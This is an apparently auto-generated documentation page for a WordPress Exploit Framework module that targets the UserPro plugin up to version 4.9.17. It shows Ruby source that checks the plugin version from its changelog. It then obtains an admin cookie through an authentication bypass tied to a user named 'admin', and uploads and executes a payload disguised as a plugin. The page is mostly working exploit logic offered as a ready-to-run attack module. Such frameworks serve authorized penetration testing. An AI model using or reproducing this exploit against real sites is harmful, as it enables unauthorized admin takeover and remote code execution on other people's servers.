class Wpxf::Exploit::UserProShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/userpro_shell_upload.rb, line 8 def initialize super update_info( name: 'UserPro <= 4.9.17 Shell Upload', desc: %( Prior to version 4.9.17.1, the UserPro plugin is vulnerable to an authentication bypass if a user named "admin" exists. Using this vulnerability, this module gains admin rights and uploads a payload to the target in the form of a plugin. ), author: [ 'Colette Chamberland', # Disclosure 'Iain Hadgraft', # Disclosure 'rastating' # WPXF Module ], date: 'Nov 11 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/userpro_shell_upload.rb, line 28 def check changelog = normalize_uri(wordpress_url_plugins, 'userpro', 'changelog.txt') regex = /Version\s+([\d\.]+)\s+/ check_version_from_custom_file(changelog, regex, '4.9.17.1') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/userpro_shell_upload.rb, line 51 def run return false unless super emit_info 'Acquiring admin cookie...' cookie = fetch_admin_cookie if cookie.nil? emit_error 'Failed to acquire an admin cookie. A user named "admin" may not exist.' return false end emit_info 'Uploading payload...' res = upload_payload_as_plugin_and_execute( Text.rand_alpha(10), Text.rand_alpha(10), cookie ) !res.nil? end